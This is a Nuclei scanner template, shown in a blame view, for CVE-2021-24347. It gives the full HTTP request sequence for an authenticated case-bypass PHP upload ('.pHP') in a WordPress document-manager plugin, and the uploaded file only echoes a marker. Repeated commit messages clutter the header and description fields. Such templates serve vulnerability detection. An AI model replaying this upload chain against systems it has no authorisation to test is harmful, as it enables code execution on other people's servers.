nuclei-templates/http/cves/2021/CVE-2021-24347.yaml

106 lines
3.8 KiB
YAML
Raw Normal View History

2023-03-05 13:42:10 +00:00
id: CVE-2021-24347
info:
Dashboard Content Enhancements (#6965) * Add description and enhance one where the UI failed to save properly. dos2unix on a template * Change cvedetails link to nvd * make severities match * Enhancement: cves/2015/CVE-2015-2863.yaml by md * Enhancement: cves/2017/CVE-2017-14524.yaml by md * Enhancement: cves/2017/CVE-2017-5638.yaml by md * Enhancement: cves/2019/CVE-2019-16759.yaml by md * Enhancement: cves/2021/CVE-2021-22986.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24155.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24347.yaml by md * Enhancement: cves/2021/CVE-2021-25003.yaml by md * Enhancement: cves/2021/CVE-2021-25296.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-25296.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-25298.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-28151.yaml by md * Enhancement: cves/2021/CVE-2021-30128.yaml by md * Enhancement: cves/2022/CVE-2022-0824.yaml by md * Enhancement: cves/2022/CVE-2022-0824.yaml by md * Enhancement: cves/2022/CVE-2022-0885.yaml by md * Enhancement: cves/2022/CVE-2022-21587.yaml by md * Enhancement: cves/2022/CVE-2022-2314.yaml by md * Enhancement: cves/2022/CVE-2022-24816.yaml by md * Enhancement: cves/2022/CVE-2022-31499.yaml by md * Enhancement: cves/2022/CVE-2022-21587.yaml by md * Enhancement: cves/2021/CVE-2021-24155.yaml by md * Enhancement: cves/2017/CVE-2017-5638.yaml by md * Enhancement: cves/2015/CVE-2015-2863.yaml by md * Enhancement: cves/2022/CVE-2022-33901.yaml by md * Enhancement: cves/2022/CVE-2022-2314.yaml by md * Enhancement: cves/2022/CVE-2022-33901.yaml by md * Enhancement: cves/2022/CVE-2022-34753.yaml by md * Enhancement: cves/2022/CVE-2022-39952.yaml by md * Enhancement: cves/2022/CVE-2022-4060.yaml by md * Enhancement: cves/2022/CVE-2022-44877.yaml by md * Enhancement: cves/2023/CVE-2023-0669.yaml by md * Enhancement: cves/2023/CVE-2023-26255.yaml by md * Enhancement: cves/2023/CVE-2023-26256.yaml by md * Enhancement: exposures/files/salesforce-credentials.yaml by md * Enhancement: misconfiguration/hadoop-unauth-rce.yaml by md * Enhancement: misconfiguration/installer/nopcommerce-installer.yaml by md * Enhancement: network/backdoor/backdoored-zte.yaml by md * Enhancement: network/detection/ibm-d2b-database-server.yaml by md * Enhancement: network/detection/ibm-d2b-database-server.yaml by md * Enhancement: technologies/oracle/oracle-atg-commerce.yaml by md * Enhancement: token-spray/api-abuseipdb.yaml by md * Enhancement: token-spray/api-abuseipdb.yaml by md * Enhancement: token-spray/api-dbt.yaml by md * Enhancement: vulnerabilities/avaya/avaya-aura-rce.yaml by md * Enhancement: vulnerabilities/avaya/avaya-aura-xss.yaml by md * Enhancement: vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml by md * Enhancement: vulnerabilities/froxlor-xss.yaml by md * Enhancement: vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/opencpu/opencpu-rce.yaml by md * Enhancement: vulnerabilities/other/academy-lms-xss.yaml by md * Enhancement: vulnerabilities/other/caucho-resin-info-disclosure.yaml by md * Enhancement: vulnerabilities/other/ckan-dom-based-xss.yaml by md * Enhancement: vulnerabilities/other/couchdb-adminparty.yaml by md * Enhancement: vulnerabilities/other/graylog-log4j.yaml by md * Enhancement: vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml by md * Initial cleanups for syntax errors * dashboard gremlins * Add log4j back to name * Enhancement: exposures/files/salesforce-credentials.yaml by cs * Enhancement: misconfiguration/installer/nopcommerce-installer.yaml by cs * Enhancement: network/backdoor/backdoored-zte.yaml by cs * Enhancement: vulnerabilities/other/couchdb-adminparty.yaml by cs * Sev and other info tweaks * Merge conflict --------- Co-authored-by: sullo <sullo@cirt.net>
2023-03-27 17:46:47 +00:00
name: WordPress SP Project & Document Manager <4.22 - Authenticated Shell Upload
2023-03-05 13:42:10 +00:00
author: theamanrawat
severity: high
description: |
Dashboard Content Enhancements (#6965) * Add description and enhance one where the UI failed to save properly. dos2unix on a template * Change cvedetails link to nvd * make severities match * Enhancement: cves/2015/CVE-2015-2863.yaml by md * Enhancement: cves/2017/CVE-2017-14524.yaml by md * Enhancement: cves/2017/CVE-2017-5638.yaml by md * Enhancement: cves/2019/CVE-2019-16759.yaml by md * Enhancement: cves/2021/CVE-2021-22986.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24155.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24347.yaml by md * Enhancement: cves/2021/CVE-2021-25003.yaml by md * Enhancement: cves/2021/CVE-2021-25296.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-25296.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-25298.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-28151.yaml by md * Enhancement: cves/2021/CVE-2021-30128.yaml by md * Enhancement: cves/2022/CVE-2022-0824.yaml by md * Enhancement: cves/2022/CVE-2022-0824.yaml by md * Enhancement: cves/2022/CVE-2022-0885.yaml by md * Enhancement: cves/2022/CVE-2022-21587.yaml by md * Enhancement: cves/2022/CVE-2022-2314.yaml by md * Enhancement: cves/2022/CVE-2022-24816.yaml by md * Enhancement: cves/2022/CVE-2022-31499.yaml by md * Enhancement: cves/2022/CVE-2022-21587.yaml by md * Enhancement: cves/2021/CVE-2021-24155.yaml by md * Enhancement: cves/2017/CVE-2017-5638.yaml by md * Enhancement: cves/2015/CVE-2015-2863.yaml by md * Enhancement: cves/2022/CVE-2022-33901.yaml by md * Enhancement: cves/2022/CVE-2022-2314.yaml by md * Enhancement: cves/2022/CVE-2022-33901.yaml by md * Enhancement: cves/2022/CVE-2022-34753.yaml by md * Enhancement: cves/2022/CVE-2022-39952.yaml by md * Enhancement: cves/2022/CVE-2022-4060.yaml by md * Enhancement: cves/2022/CVE-2022-44877.yaml by md * Enhancement: cves/2023/CVE-2023-0669.yaml by md * Enhancement: cves/2023/CVE-2023-26255.yaml by md * Enhancement: cves/2023/CVE-2023-26256.yaml by md * Enhancement: exposures/files/salesforce-credentials.yaml by md * Enhancement: misconfiguration/hadoop-unauth-rce.yaml by md * Enhancement: misconfiguration/installer/nopcommerce-installer.yaml by md * Enhancement: network/backdoor/backdoored-zte.yaml by md * Enhancement: network/detection/ibm-d2b-database-server.yaml by md * Enhancement: network/detection/ibm-d2b-database-server.yaml by md * Enhancement: technologies/oracle/oracle-atg-commerce.yaml by md * Enhancement: token-spray/api-abuseipdb.yaml by md * Enhancement: token-spray/api-abuseipdb.yaml by md * Enhancement: token-spray/api-dbt.yaml by md * Enhancement: vulnerabilities/avaya/avaya-aura-rce.yaml by md * Enhancement: vulnerabilities/avaya/avaya-aura-xss.yaml by md * Enhancement: vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml by md * Enhancement: vulnerabilities/froxlor-xss.yaml by md * Enhancement: vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/opencpu/opencpu-rce.yaml by md * Enhancement: vulnerabilities/other/academy-lms-xss.yaml by md * Enhancement: vulnerabilities/other/caucho-resin-info-disclosure.yaml by md * Enhancement: vulnerabilities/other/ckan-dom-based-xss.yaml by md * Enhancement: vulnerabilities/other/couchdb-adminparty.yaml by md * Enhancement: vulnerabilities/other/graylog-log4j.yaml by md * Enhancement: vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml by md * Initial cleanups for syntax errors * dashboard gremlins * Add log4j back to name * Enhancement: exposures/files/salesforce-credentials.yaml by cs * Enhancement: misconfiguration/installer/nopcommerce-installer.yaml by cs * Enhancement: network/backdoor/backdoored-zte.yaml by cs * Enhancement: vulnerabilities/other/couchdb-adminparty.yaml by cs * Sev and other info tweaks * Merge conflict --------- Co-authored-by: sullo <sullo@cirt.net>
2023-03-27 17:46:47 +00:00
WordPress SP Project & Document Manager plugin before 4.22 is susceptible to authenticated shell upload. The plugin allows users to upload files; however, the plugin attempts to prevent PHP and other similar executable files from being uploaded via checking the file extension. PHP files can still be uploaded by changing the file extension's case, for example, from php to pHP.
2023-09-06 12:09:01 +00:00
remediation: Fixed in version 4.22.
2023-03-05 13:42:10 +00:00
reference:
- https://wpscan.com/vulnerability/8f6e82d5-c0e9-468e-acb8-7cd549f6a45a
- https://wordpress.org/plugins/sp-client-document-manager/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24347
- http://packetstormsecurity.com/files/163434/WordPress-SP-Project-And-Document-Manager-4.21-Shell-Upload.html
2023-03-05 13:42:10 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
2023-03-05 13:42:10 +00:00
cve-id: CVE-2021-24347
cwe-id: CWE-178
2023-08-31 11:46:18 +00:00
epss-score: 0.96951
epss-percentile: 0.99656
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:smartypantsplugins:sp_project_\&_document_manager:*:*:*:*:*:wordpress:*:*
2023-03-05 13:42:10 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 12:09:01 +00:00
max-request: 4
2023-07-11 19:49:27 +00:00
vendor: smartypantsplugins
product: sp_project_\&_document_manager
2023-09-06 12:09:01 +00:00
framework: wordpress
2023-07-11 19:49:27 +00:00
tags: sp-client-document-manager,wpscan,cve,wp-plugin,wp,authenticated,wordpress,cve2021,rce,packetstorm,intrusive
2023-03-05 13:42:10 +00:00
http:
2023-03-05 13:42:10 +00:00
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=sp-client-document-manager-fileview HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaeBrxrKJzAF0Tgfy
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="cdm_upload_file_field"
{{nonce}}
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="_wp_http_referer"
/wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="dlg-upload-name"
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="dlg-upload-file[]"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="dlg-upload-file[]"; filename="{{randstr}}.pHP"
Content-Type: image/svg+xml
<?php
echo "CVE-2021-24347";
?>
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="dlg-upload-notes"
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="sp-cdm-community-upload"
Upload
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy--
- |
GET /wp-content/uploads/sp-client-document-manager/1/{{to_lower("{{randstr}}.pHP")}} HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
2023-07-11 19:49:27 +00:00
2023-03-05 13:42:10 +00:00
matchers-condition: and
matchers:
- type: dsl
dsl:
- contains(header_4, "text/html")
2023-03-05 13:42:10 +00:00
- status_code_4 == 200
- contains(body_4, "CVE-2021-24347")
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
2023-07-11 19:49:27 +00:00
- name="cdm_upload_file_field" value="([0-9a-zA-Z]+)"
2023-03-05 13:42:10 +00:00
internal: true
# digest: 4a0a0047304502210088758e428f399ffe79e5b5cc7a6a3d7289a3752889f518fcebd8f371cd63bb420220258539429423ca482057a05f1a75514852c35a295917944e83beed526cfbdc04:922c64590222798bb761d5b6d8e72950